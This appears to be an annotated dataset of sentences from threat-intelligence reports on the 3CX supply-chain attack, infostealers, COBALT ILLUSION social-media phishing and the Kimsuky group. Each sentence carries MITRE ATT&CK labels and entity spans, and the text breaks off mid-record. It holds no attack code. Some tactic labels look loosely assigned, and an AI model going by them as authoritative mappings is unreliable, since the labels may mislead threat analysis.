[ { "uid": "aptnotes-01_aptnotes_report-p2-s1-428914", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 1, "context_before": "", "sentence_text": "EXECUTIVE SUMMARY\nThe Secureworks® Counter Threat Unit™ (CTU) research team analyzes security threats to help organizations protect their systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s2-d05d6e", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 2, "context_before": "EXECUTIVE SUMMARY\nThe Secureworks® Counter Threat Unit™ (CTU) research team analyzes security threats to help organizations protect their systems.", "sentence_text": "Based on observations in March and April, CTU™ researchers identified the following noteworthy issues and changes in the global threat landscape:\n• Cascading supply chain attacks bring extra risk •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s3-a8749b", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 3, "context_before": "Based on observations in March and April, CTU™ researchers identified the following noteworthy issues and changes in the global threat landscape:\n• Cascading supply chain attacks bring extra risk •", "sentence_text": "Infostealers are a gateway to ransomware attacks •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s4-df3f5f", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 4, "context_before": "Infostealers are a gateway to ransomware attacks •", "sentence_text": "Avoid the cyber dangers that lurk outside your perimeter CASCADING SUPPLY CHAIN ATTACKS BRING EXTRA RISK", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s5-4e7c70", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 5, "context_before": "Avoid the cyber dangers that lurk outside your perimeter CASCADING SUPPLY CHAIN ATTACKS BRING EXTRA RISK", "sentence_text": "The origin of the 3CX compromise reveals added complexity for organizations assessing the risk of supply chain attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s6-35f6da", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 6, "context_before": "The origin of the 3CX compromise reveals added complexity for organizations assessing the risk of supply chain attacks.", "sentence_text": "The SolarWinds supply chain compromise by a Russian state-sponsored threat group in 2020 remains one of the most significant example of attacks that originate from compromised vendor products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s7-34615f", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 7, "context_before": "The SolarWinds supply chain compromise by a Russian state-sponsored threat group in 2020 remains one of the most significant example of attacks that originate from compromised vendor products.", "sentence_text": "However, a supply chain attack discovered in March 2023 added a new dimension to the risk that organizations face.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s8-023bde", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 8, "context_before": "However, a supply chain attack discovered in March 2023 added a new dimension to the risk that organizations face.", "sentence_text": "During this attack, multiple versions of a 3CX softphone application were infected with malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Multiple versions of a 3CX softphone application were infected with malware during a supply chain attack.", "entities": [ { "text": "3CX softphone application", "start": 43, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "infected with malware", "start": 74, "end": 95, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p2-s9-b27f6e", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 9, "context_before": "During this attack, multiple versions of a 3CX softphone application were infected with malware.", "sentence_text": "The incident is thought to be the first example of a ‘double supply chain’ attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s10-e44ed5", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "The incident is thought to be the first example of a ‘double supply chain’ attack.", "sentence_text": "According to Mandiant, the compromise conducted by North Korean state-sponsored threat actors started when someone at 3CX downloaded an installer for the X_TRADER futures trading platform from Trading Technologies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Download trojanized installer from a trusted vendor as part of a supply chain compromise.", "entities": [ { "text": "North Korean state-sponsored threat actors", "start": 51, "end": 93, "label": "ThreatActor" }, { "text": "downloaded an installer for the X_TRADER", "start": 122, "end": 162, "label": "Action" }, { "text": "Trading Technologies", "start": 193, "end": 213, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-01_aptnotes_report-p2-s11-24c943", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "According to Mandiant, the compromise conducted by North Korean state-sponsored threat actors started when someone at 3CX downloaded an installer for the X_TRADER futures trading platform from Trading Technologies.", "sentence_text": "This platform was infected in an earlier North Korean intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s12-7f2024", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "This platform was infected in an earlier North Korean intrusion.", "sentence_text": "As a result, the attackers gained access to 3CX software development systems and infected its products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Gain access to 3CX development systems and infect software products.", "entities": [ { "text": "the attackers", "start": 13, "end": 26, "label": "ThreatActor" }, { "text": "gained access to 3CX software development systems", "start": 27, "end": 76, "label": "Action" }, { "text": "infected its products", "start": 81, "end": 102, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p2-s13-11ec8a", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "As a result, the attackers gained access to 3CX software development systems and infected its products.", "sentence_text": "North Korea is known for financially motivated attacks and cyberespionage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s14-a75034", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "North Korea is known for financially motivated attacks and cyberespionage.", "sentence_text": "The attack on Trading Technologies was likely financially motivated and affected users in the critical infrastructure and financial trading sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s15-9d03b5", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "The attack on Trading Technologies was likely financially motivated and affected users in the critical infrastructure and financial trading sectors.", "sentence_text": "Its impact allowed the threat actors to build on the resulting opportunistic compromise of 3CX for more targeted espionage attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s16-e36a52", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "Its impact allowed the threat actors to build on the resulting opportunistic compromise of 3CX for more targeted espionage attacks.", "sentence_text": "In Volume 2023 Number 2 of the Secureworks Threat Intelligence Executive Report, we discussed how much of the onus for preventing software security incidents currently falls on users rather than vendors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p2-s17-1ba8f3", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "In Volume 2023 Number 2 of the Secureworks Threat Intelligence Executive Report, we discussed how much of the onus for preventing software security incidents currently falls on users rather than vendors.", "sentence_text": "Conducting due diligence on vendors’ security practices is an essential part of mitigating and preventing compromises.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s18-f5d58d", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 18, "context_before": "Conducting due diligence on vendors’ security practices is an essential part of mitigating and preventing compromises.", "sentence_text": "What you should do next:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s19-a91105", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 19, "context_before": "What you should do next:", "sentence_text": "Understand where and how you use third-party applications so you can react quickly if a supply chain attack occurs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s20-c215e8", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "Understand where and how you use third-party applications so you can react quickly if a supply chain attack occurs.", "sentence_text": "Only permit authorized software downloads required by your business and define baseline behavior for each application.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s21-7e7b10", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "Only permit authorized software downloads required by your business and define baseline behavior for each application.", "sentence_text": "Implement layered controls to detect any baseline deviations and potential post-exploitation activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s22-c1fd83", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "Implement layered controls to detect any baseline deviations and potential post-exploitation activity.", "sentence_text": "INFOSTEALERS ARE A GATEWAY TO RANSOMWARE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s23-f7cf55", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "INFOSTEALERS ARE A GATEWAY TO RANSOMWARE", "sentence_text": "ATTACKS Ransomware activity appears to continue unabated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s24-e36f09", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "ATTACKS Ransomware activity appears to continue unabated.", "sentence_text": "Infostealer malware likely plays a significant role in the credential-harvesting activity that can lead to ransomware attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s25-d81096", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "Infostealer malware likely plays a significant role in the credential-harvesting activity that can lead to ransomware attacks.", "sentence_text": "One of the techniques threat actors use to obtain stolen credentials is infecting victims’ systems with infostealer (also known as stealer) malware.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "Infect victim systems with infostealer malware to obtain credentials.", "entities": [ { "text": "threat actors", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "infecting victims’ systems with infostealer (also known as stealer) malware", "start": 72, "end": 147, "label": "Action" }, { "text": "infostealer", "start": 104, "end": 115, "label": "MalwareTool" } ] }, { "uid": "aptnotes-01_aptnotes_report-p3-s26-8183e0", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "One of the techniques threat actors use to obtain stolen credentials is infecting victims’ systems with infostealer (also known as stealer) malware.", "sentence_text": "Infostealers work very quickly on an infected system, often collecting and transmitting data to the threat actor within seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s27-b1f17b", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "Infostealers work very quickly on an infected system, often collecting and transmitting data to the threat actor within seconds.", "sentence_text": "Infostealers are advertised for sale or rent on underground markets for as low as $50 USD a month.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s28-dc7d2a", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "Infostealers work very quickly on an infected system, often collecting and transmitting data to the threat actor within seconds.", "sentence_text": "Infostealer malware installed on a computer or device via malicious software downloads or phishing attacks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Install infostealer malware via phishing or malicious downloads.", "entities": [ { "text": "installed on a computer or device via malicious software downloads or phishing attacks", "start": 21, "end": 107, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p3-s29-7b0353", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "Infostealer malware can be installed on a computer or device via malicious software downloads or phishing attacks if users visit infected websites.", "sentence_text": "Most of the popular infostealers can deliver additional malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s30-9b7b48", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "Most of the popular infostealers can deliver additional malware.", "sentence_text": "Kits are also available to help threat actors write their own infostealers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s31-34b8cf", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Kits are also available to help threat actors write their own infostealers.", "sentence_text": "The stolen credentials can be leveraged in further attacks or packaged as ‘logs’ and sold to other threat actors on underground marketplaces.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s32-67793d", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "The stolen credentials can be leveraged in further attacks or packaged as ‘logs’ and sold to other threat actors on underground marketplaces.", "sentence_text": "The ransomware-as-a-service model makes information pilfered by infostealers valuable for ransomware affiliates seeking initial access to enterprises.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s33-55fc6a", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "The ransomware-as-a-service model makes information pilfered by infostealers valuable for ransomware affiliates seeking initial access to enterprises.", "sentence_text": "Some marketplaces allow threat actors to parse logs to find data about specific organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s34-1efe51", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "Some marketplaces allow threat actors to parse logs to find data about specific organizations.", "sentence_text": "The number of stolen credentials advertised on underground forums keeps increasing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s35-4b3376", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "The number of stolen credentials advertised on underground forums keeps increasing.", "sentence_text": "Eight months earlier, that figure was 2.8 million.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s36-a2c705", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 36, "context_before": "Eight months earlier, that figure was 2.8 million.", "sentence_text": "This type of malware is a known precursor to ransomware attacks, and ransomware activity continues to pose a major threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s37-bb1b7b", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 37, "context_before": "This type of malware is a known precursor to ransomware attacks, and ransomware activity continues to pose a major threat.", "sentence_text": "As a result, it is essential that organizations can detect and protect against infostealers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p3-s38-29be66", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 3, "sentence_id": 38, "context_before": "As a result, it is essential that organizations can detect and protect against infostealers.", "sentence_text": "What you should do next:\nRead the CTU analysis on the growing threat from infostealers for more information on how they operate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s39-6005eb", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "What you should do next:\nRead the CTU analysis on the growing threat from infostealers for more information on how they operate.", "sentence_text": "AVOID THE CYBER DANGERS THAT LURK OUTSIDE YOUR PERIMETER Sophisticated threat actors are increasingly approaching prospective victims via personal social media.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s40-33c69f", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "AVOID THE CYBER DANGERS THAT LURK OUTSIDE YOUR PERIMETER Sophisticated threat actors are increasingly approaching prospective victims via personal social media.", "sentence_text": "In March, CTU researchers publicly released details about COBALT ILLUSION’s abuse of hijacked and fake social media accounts to contact potential espionage targets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "COBALT ILLUSION abused hijacked and fake social media accounts to contact potential espionage targets.", "entities": [ { "text": "COBALT ILLUSION", "start": 58, "end": 73, "label": "ThreatActor" }, { "text": "abuse of hijacked and fake social media accounts to contact potential espionage targets", "start": 76, "end": 163, "label": "Action" }, { "text": "hijacked and fake social media accounts", "start": 85, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "contact potential espionage targets", "start": 128, "end": 163, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p4-s41-101766", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "In March, CTU researchers publicly released details about COBALT ILLUSION’s abuse of hijacked and fake social media accounts to contact potential espionage targets.", "sentence_text": "Iranian state-sponsored threat actors have a history of this type of activity; the Mia Ash persona widely publicized in 2017 was the work of an Iranian threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s42-906b33", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "Iranian state-sponsored threat actors have a history of this type of activity; the Mia Ash persona widely publicized in 2017 was the work of an Iranian threat group.", "sentence_text": "China conducts similar campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s43-d36ff0", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "China conducts similar campaigns.", "sentence_text": "In a July 2022 joint address, the heads of the British Security Service (MI5)\nand the U.S. Federal Bureau of Investigation (FBI) warned about Chinese intelligence officers contacting a British aviation expert online who was then “wined and dined” before being tapped for technical information on military aircraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s44-302d44", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "In a July 2022 joint address, the heads of the British Security Service (MI5)\nand the U.S. Federal Bureau of Investigation (FBI) warned about Chinese intelligence officers contacting a British aviation expert online who was then “wined and dined” before being tapped for technical information on military aircraft.", "sentence_text": "A U.S. indictment unsealed in October 2018 indicated that Chinese intelligence operatives forged relationships with individuals in sensitive roles via email to steal intellectual property.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Forge relationships via email to steal intellectual property.", "entities": [ { "text": "Chinese intelligence operatives", "start": 58, "end": 89, "label": "ThreatActor" }, { "text": "forged relationships with individuals in sensitive roles via email to steal intellectual property", "start": 90, "end": 187, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p4-s45-af8aea", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "A U.S. indictment unsealed in October 2018 indicated that Chinese intelligence operatives forged relationships with individuals in sensitive roles via email to steal intellectual property.", "sentence_text": "This relationship can ultimately lead to a compromise that originated beyond the reach of organizational security controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s46-e23d90", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "This relationship can ultimately lead to a compromise that originated beyond the reach of organizational security controls.", "sentence_text": "For example, COBALT ILLUSION’s Twitter personas distributed phishing links via direct messages to steal victims’ login credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1056", "name": "Input Capture" } ], "procedure": "Distribute phishing links via direct messages to steal victims’ login credentials.", "entities": [ { "text": "COBALT ILLUSION", "start": 13, "end": 28, "label": "ThreatActor" }, { "text": "distributed phishing links via direct messages to steal victims’ login credentials", "start": 48, "end": 130, "label": "Action" } ] }, { "uid": "aptnotes-01_aptnotes_report-p4-s47-e7cf4f", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 47, "context_before": "For example, COBALT ILLUSION’s Twitter personas distributed phishing links via direct messages to steal victims’ login credentials.", "sentence_text": "In general, user education should be a last line of defense rather than the first.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s48-15e164", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 48, "context_before": "In general, user education should be a last line of defense rather than the first.", "sentence_text": "In these incidents, warning employees to be wary of unsolicited contact on social media is essential.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s49-ba62e4", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 49, "context_before": "In these incidents, warning employees to be wary of unsolicited contact on social media is essential.", "sentence_text": "However, education should also be coupled with monitoring to identify suspicious login attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s50-6ac4f6", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 50, "context_before": "However, education should also be coupled with monitoring to identify suspicious login attempts.", "sentence_text": "What you should do next:\nUnderstand your attack surface, especially any overlaps with resources that employees may access via both corporate and personal devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s51-4cb4a4", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 51, "context_before": "What you should do next:\nUnderstand your attack surface, especially any overlaps with resources that employees may access via both corporate and personal devices.", "sentence_text": "Implement processes for employees to report suspicious contact or activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p4-s52-58ac9f", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 4, "sentence_id": 52, "context_before": "Implement processes for employees to report suspicious contact or activity.", "sentence_text": "CONCLUSION\nThreat actors are continually seeking ways to conduct attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p5-s53-93a4ee", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 5, "sentence_id": 53, "context_before": "CONCLUSION\nThreat actors are continually seeking ways to conduct attacks.", "sentence_text": "This process enables CTU researchers to identify threats as they emerge and develop countermeasures that protect customers before damage can occur.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p5-s54-f00d57", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 5, "sentence_id": 54, "context_before": "This process enables CTU researchers to identify threats as they emerge and develop countermeasures that protect customers before damage can occur.", "sentence_text": "Research Intelligence Integration Understanding the nature of Providing information that Infusing CTU research and threats customers face, and extends the visibility of intelligence into Secureworks creating countermeasures threats beyond the edges managed security services and to address and protect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p5-s56-2cee38", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 5, "sentence_id": 56, "context_before": "of a network.", "sentence_text": "security consulting practices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-01_aptnotes_report-p5-s57-8eca6b", "source": "aptnotes", "doc_id": "01_aptnotes_report", "page_number": 5, "sentence_id": 57, "context_before": "security consulting practices.", "sentence_text": "Atlanta, GA 30328 Saint Denis Cedex Germany", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s1-497637", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Kimsuky Group Uses AutoIt to Create Malware (RftRAT, Amadey)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s2-9e1de4", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Kimsuky Group Uses AutoIt to Create Malware (RftRAT, Amadey)", "sentence_text": "asec.ahnlab.com/en/59590\nBy Sanseo December 8, 2023 Overview Initial Access …. 2.1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s3-fede2f", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "asec.ahnlab.com/en/59590\nBy Sanseo December 8, 2023 Overview Initial Access …. 2.1.", "sentence_text": "Spear Phishing Attack ….", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s5-26bc46", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "2.2.", "sentence_text": "LNK Malware Remote Control Malware ….", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s9-b04e67", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "Amadey …. 3.3.", "sentence_text": "RftRAT Post-infection ….", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s10-d4a414", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "RftRAT Post-infection ….", "sentence_text": "Other Types Conclusion 1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s11-5f193e", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "Other Types Conclusion 1.", "sentence_text": "At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "The threat actors attacked research institutes and later a South Korean energy corporation.", "entities": [ { "text": "they", "start": 10, "end": 14, "label": "ThreatActor" }, { "text": "attacked North Korea-related research institutes in South Korea", "start": 15, "end": 78, "label": "Action" }, { "text": "attacking a South Korean energy corporation", "start": 86, "end": 129, "label": "Action" }, { "text": "North Korea-related research institutes", "start": 24, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "South Korean energy corporation", "start": 98, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p1-s12-6e13e6", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014.", "sentence_text": "Cases of attacks against countries other than South Korea have also been identified since 2017.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p1-s13-f8268b", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "Cases of attacks against countries other than South Korea have also been identified since 2017.", "sentence_text": "[1] The group usually employs spear phishing attacks against the national defense sector, defense industries, the press, the diplomatic sector, national organizations, and academic fields to steal internal information and technology from organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Employ spear phishing attacks to steal internal information from targeted organizations.", "entities": [ { "text": "employs spear phishing attacks against the national defense sector, defense industries, the press, the diplomatic sector, national organizations, and academic 